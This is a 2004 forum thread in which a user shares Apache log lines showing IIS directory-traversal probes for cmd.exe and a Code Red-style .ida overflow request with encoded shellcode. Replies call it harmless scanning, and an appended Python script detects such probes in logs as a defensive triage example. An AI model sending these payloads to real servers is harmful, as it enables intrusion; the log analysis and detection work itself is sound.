LinuxQuestions.org


sal_paradise42 01-09-2004 09:36 AM

apache logs, seeing weird things
 
Just been looking at my Apache access logs and I am noticing some weird stuff in them. When I see the date I have no idea who is getting into it or what's going on, and I have my site password protected so no one should be in it.
I will post the log. Can someone see anything from it?
log ------------------------------------------------------------------------------------------

24.1.1x.x - - [09/Jan/2004:06:27:46 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1xx - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 468
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.218.x.x - - [09/Jan/2004:07:18:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 401 634

peter_robb 01-09-2004 09:41 AM

Not too much to worry about..
It's called a Directory traversal attack aimed at a M$ server, quite harmless to you.

One look at the reply headers you have sent them and they will write you off their "possible" list.

sal_paradise42 01-09-2004 01:35 PM

Thanks for the quick response, I won't worry about it then.

dubman 01-09-2004 04:45 PM

Yep, this is what you call "script kiddies".
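
An added example, not part of the original thread: a small log triage script that tags the IIS-targeted requests discussed above and checks whether any of them received a 2xx response, which is the point behind "quite harmless to you". The sample lines are constructed, and the names `decode_fully`, `classify` and `analyze` are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in Apache common log format, modeled on the lines in the
# post; client addresses are from the 192.0.2.0/24 documentation range.
SAMPLE_LOG = """\
192.0.2.10 - - [09/Jan/2004:06:27:46 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
192.0.2.10 - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 468
192.0.2.10 - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
192.0.2.77 - - [09/Jan/2004:07:18:28 -0700] "GET /default.ida?XXXXXXXX%u9090%u6858 HTTP/1.0" 401 634
192.0.2.50 - alice [09/Jan/2004:08:00:01 -0700] "GET /index.html HTTP/1.1" 200 5120
"""

# Captures client address, request target (may contain spaces) and status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" (\d{3}) \S+$')

def decode_fully(target, rounds=3):
    """Percent-decode repeatedly so double-encoded '..%255c..' is seen as '..\\..'."""
    for _ in range(rounds):
        decoded = unquote(target, encoding="latin-1")
        if decoded == target:
            break
        target = decoded
    return target

def classify(target):
    """Return a label for requests aimed at IIS, or None for anything else."""
    t = decode_fully(target).lower()
    if "cmd.exe" in t and ".." in t:
        return "iis-traversal"        # encoded ../ or ..\ walk toward cmd.exe
    if re.search(r"\.ida(\?|$)", t):
        return "iis-ida-overflow"     # oversized query sent to the .ida handler
    return None

def analyze(log_text):
    """Count probes by (label, status) and list any that were answered with 2xx."""
    hits, served = Counter(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ip, target, status = m.groups()
        label = classify(target)
        if label is None:
            continue
        hits[(label, status)] += 1
        if status.startswith("2"):    # a probe the server actually served
            served.append((ip, target))
    return hits, served
```

An empty `served` list means every probe was rejected (here with 401, 404 or 400); any entry in it is the line worth investigating.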


All times are GMT -5.